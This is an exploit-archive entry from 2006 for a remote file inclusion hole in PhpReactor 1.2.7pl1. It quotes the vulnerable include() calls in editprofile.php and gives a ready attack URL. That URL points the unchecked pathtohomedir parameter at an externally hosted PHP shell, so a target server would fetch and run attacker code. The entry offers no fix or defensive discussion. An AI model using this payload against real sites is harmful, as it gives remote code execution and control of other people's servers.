PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability

2006-07-31T00:00:00
ID 1337DAY-ID-622
Type zdt
Reporter CeNGiZ-HaN
Modified 2006-07-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability
==================================================================



############################################################################
#    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability           #
############################################################################
#    Vulnerable Code in editprofile.php
#      //INCLUDE DB FUNCTIONS
#   if(!defined("REACTOR_INC_DB")) { include($pathtohomedir."/inc/db.inc.php"); }
#   //INCLUDE LANGUAGE FUNCTIONS
#   if(!defined("REACTOR_INC_LANG")) { include($pathtohomedir."/inc/lang.inc.php"); }
#   //INCLUDE USERS FUNCTIONS
#   if(!defined("REACTOR_INC_USERS")) { include($pathtohomedir."/inc/users.inc.php"); }
#   //INCLUDE BBS FUNCTIONS
#   if(!defined("REACTOR_INC_BBS")) { include($pathtohomedir."/inc/bbs.inc.php"); }
#
#
#              http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?
#
##############################################################################




#  0day.today [2018-01-02]  #